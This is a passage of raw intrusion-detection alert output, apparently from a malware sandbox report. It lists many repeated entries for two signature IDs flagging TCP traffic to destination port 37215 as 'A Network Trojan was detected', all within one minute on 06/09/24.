          SID:2829579
          Source Port:44686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946433
          SID:2829579
          Source Port:58726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.017440
          SID:2835222
          Source Port:40064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028428
          SID:2835222
          Source Port:59546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869287
          SID:2829579
          Source Port:58882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.667858
          SID:2829579
          Source Port:43106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721221
          SID:2835222
          Source Port:53838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.083014
          SID:2835222
          Source Port:57720
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947543
          SID:2835222
          Source Port:59568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718638
          SID:2835222
          Source Port:53372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225869
          SID:2835222
          Source Port:34174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.994768
          SID:2829579
          Source Port:48418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.863374
          SID:2835222
          Source Port:54074
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412737
          SID:2829579
          Source Port:38192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.169266
          SID:2835222
          Source Port:38560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.246172
          SID:2835222
          Source Port:38892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.863759
          SID:2829579
          Source Port:50784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.601896
          SID:2835222
          Source Port:51942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.541514
          SID:2835222
          Source Port:50012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223909
          SID:2835222
          Source Port:56424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.924452
          SID:2829579
          Source Port:38780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.165446
          SID:2835222
          Source Port:41922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.272682
          SID:2829579
          Source Port:59056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.411795
          SID:2829579
          Source Port:47736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.081623
          SID:2829579
          Source Port:42962
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.950818
          SID:2829579
          Source Port:49826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.400060
          SID:2829579
          Source Port:47690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.032700
          SID:2835222
          Source Port:55114
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820443
          SID:2829579
          Source Port:33446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944889
          SID:2829579
          Source Port:53662
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.930314
          SID:2829579
          Source Port:42450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104503
          SID:2829579
          Source Port:42498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645612
          SID:2835222
          Source Port:50520
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.357497
          SID:2835222
          Source Port:43484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714112
          SID:2829579
          Source Port:49798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.920944
          SID:2829579
          Source Port:46964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.864561
          SID:2829579
          Source Port:38566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.290206
          SID:2829579
          Source Port:48064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.290140
          SID:2829579
          Source Port:55572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.571471
          SID:2829579
          Source Port:45236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.244028
          SID:2829579
          Source Port:43062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716527
          SID:2835222
          Source Port:50808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.567365
          SID:2829579
          Source Port:47206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818063
          SID:2835222
          Source Port:44912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.724239
          SID:2835222
          Source Port:39774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.910703
          SID:2829579
          Source Port:57840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.931418
          SID:2835222
          Source Port:34342
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.281051
          SID:2829579
          Source Port:47806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399017
          SID:2829579
          Source Port:60396
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033765
          SID:2829579
          Source Port:45172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.032679
          SID:2835222
          Source Port:33356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.995777
          SID:2835222
          Source Port:54054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.900187
          SID:2829579
          Source Port:37090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.986515
          SID:2835222
          Source Port:40430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928462
          SID:2835222
          Source Port:56458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.930173
          SID:2835222
          Source Port:52374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.935433
          SID:2835222
          Source Port:43440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:46.417406
          SID:2829579
          Source Port:48446
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.466794
          SID:2835222
          Source Port:37440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399313
          SID:2835222
          Source Port:55392
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.920203
          SID:2829579
          Source Port:48844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.998551
          SID:2829579
          Source Port:43614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.466889
          SID:2829579
          Source Port:36696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398389
          SID:2835222
          Source Port:38496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.868891
          SID:2829579
          Source Port:47620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.652897
          SID:2829579
          Source Port:42072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248106
          SID:2829579
          Source Port:37424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.539326
          SID:2835222
          Source Port:52232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.167359
          SID:2829579
          Source Port:48064
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.475178
          SID:2835222
          Source Port:35552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.159885
          SID:2829579
          Source Port:46014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.287958
          SID:2835222
          Source Port:45786
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538681
          SID:2835222
          Source Port:39158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.940039
          SID:2835222
          Source Port:59072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818195
          SID:2835222
          Source Port:53876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822448
          SID:2835222
          Source Port:56824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.909149
          SID:2829579
          Source Port:45172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.014318
          SID:2829579
          Source Port:43056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645708
          SID:2835222
          Source Port:35296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929123
          SID:2829579
          Source Port:56296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.472894
          SID:2835222
          Source Port:59458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.989726
          SID:2829579
          Source Port:53706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.253162
          SID:2829579
          Source Port:36754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.035000
          SID:2835222
          Source Port:55908
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.253021
          SID:2835222
          Source Port:38632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.991922
          SID:2829579
          Source Port:34136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.034009
          SID:2835222
          Source Port:41286
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.160285
          SID:2829579
          Source Port:38290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.400207
          SID:2829579
          Source Port:54044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.595717
          SID:2835222
          Source Port:35358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.209762
          SID:2835222
          Source Port:46568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035538
          SID:2835222
          Source Port:46956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.540105
          SID:2829579
          Source Port:41068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.165431
          SID:2829579
          Source Port:60498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945116
          SID:2829579
          Source Port:59500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.130076
          SID:2829579
          Source Port:53776
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.914431
          SID:2829579
          Source Port:38790
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.568388
          SID:2835222
          Source Port:53072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206794
          SID:2835222
          Source Port:57188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413091
          SID:2835222
          Source Port:49484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.490206
          SID:2829579
          Source Port:59968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248834
          SID:2835222
          Source Port:43304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.866073
          SID:2829579
          Source Port:51306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.915116
          SID:2835222
          Source Port:60136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413871
          SID:2835222
          Source Port:38724
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.475833
          SID:2829579
          Source Port:57752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.285926
          SID:2835222
          Source Port:43434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.472416
          SID:2829579
          Source Port:58784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948883
          SID:2835222
          Source Port:41502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.164270
          SID:2829579
          Source Port:43084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.131302
          SID:2835222
          Source Port:36586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.269991
          SID:2829579
          Source Port:51824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.646014
          SID:2829579
          Source Port:40300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.075296
          SID:2829579
          Source Port:52942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.089501
          SID:2829579
          Source Port:45028
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820061
          SID:2835222
          Source Port:49758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.605975
          SID:2829579
          Source Port:33054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.277258
          SID:2835222
          Source Port:37628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716751
          SID:2829579
          Source Port:58146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.036083
          SID:2835222
          Source Port:58760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103836
          SID:2829579
          Source Port:51458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.862014
          SID:2829579
          Source Port:36082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.467769
          SID:2829579
          Source Port:38824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.986302
          SID:2835222
          Source Port:51336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.396985
          SID:2829579
          Source Port:45978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716621
          SID:2835222
          Source Port:53678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038687
          SID:2835222
          Source Port:51676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.922109
          SID:2829579
          Source Port:50658
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.292902
          SID:2829579
          Source Port:33614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.474568
          SID:2835222
          Source Port:57202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643641
          SID:2835222
          Source Port:59822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287295
          SID:2835222
          Source Port:60178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.902202
          SID:2835222
          Source Port:59584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.399035
          SID:2835222
          Source Port:58954
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.915135
          SID:2835222
          Source Port:33764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225711
          SID:2829579
          Source Port:41558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945828
          SID:2835222
          Source Port:45764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.989744
          SID:2829579
          Source Port:47434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.004498
          SID:2829579
          Source Port:55604
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.602803
          SID:2829579
          Source Port:59958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.293965
          SID:2835222
          Source Port:56054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.552464
          SID:2829579
          Source Port:49836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.473573
          SID:2829579
          Source Port:54682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.646336
          SID:2835222
          Source Port:53644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.596988
          SID:2829579
          Source Port:40508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223656
          SID:2829579
          Source Port:42300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.305293
          SID:2835222
          Source Port:59590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.537966
          SID:2835222
          Source Port:56350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.472256
          SID:2835222
          Source Port:43636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823580
          SID:2835222
          Source Port:35754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223785
          SID:2829579
          Source Port:41958
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.473671
          SID:2835222
          Source Port:43294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.031564
          SID:2829579
          Source Port:37052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414276
          SID:2835222
          Source Port:39072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.473617
          SID:2829579
          Source Port:42438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.931432
          SID:2829579
          Source Port:39066
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412504
          SID:2835222
          Source Port:60686
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.931867
          SID:2835222
          Source Port:46968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.160362
          SID:2829579
          Source Port:58438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.008654
          SID:2835222
          Source Port:43306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.267416
          SID:2835222
          Source Port:38984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.566473
          SID:2835222
          Source Port:44670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644503
          SID:2829579
          Source Port:35980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.032755
          SID:2829579
          Source Port:58566
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.132751
          SID:2829579
          Source Port:35828
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818660
          SID:2829579
          Source Port:52598
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.289396
          SID:2835222
          Source Port:32838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.819396
          SID:2835222
          Source Port:42322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.920920
          SID:2829579
          Source Port:44858
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.162220
          SID:2829579
          Source Port:57478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.645670
          SID:2829579
          Source Port:48418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.915965
          SID:2835222
          Source Port:33882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928295
          SID:2835222
          Source Port:52126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.312250
          SID:2829579
          Source Port:52964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.990880
          SID:2829579
          Source Port:52504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.602649
          SID:2835222
          Source Port:45650
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.162399
          SID:2835222
          Source Port:59250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.036863
          SID:2829579
          Source Port:52864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.163308
          SID:2829579
          Source Port:38920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223013
          SID:2835222
          Source Port:52972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104503
          SID:2829579
          Source Port:53894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.922274
          SID:2835222
          Source Port:38096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.923634
          SID:2829579
          Source Port:48788
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.983718
          SID:2835222
          Source Port:41290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716748
          SID:2829579
          Source Port:40402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.473780
          SID:2829579
          Source Port:51946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538870
          SID:2829579
          Source Port:32846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206469
          SID:2829579
          Source Port:45688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720242
          SID:2835222
          Source Port:43832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206607
          SID:2835222
          Source Port:54614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.035532
          SID:2829579
          Source Port:38730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.296383
          SID:2835222
          Source Port:34820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.904386
          SID:2835222
          Source Port:43460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.079396
          SID:2829579
          Source Port:44992
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398956
          SID:2829579
          Source Port:46432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.915674
          SID:2835222
          Source Port:47188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.915067
          SID:2829579
          Source Port:40672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820649
          SID:2835222
          Source Port:35898
          Destination Port:37215
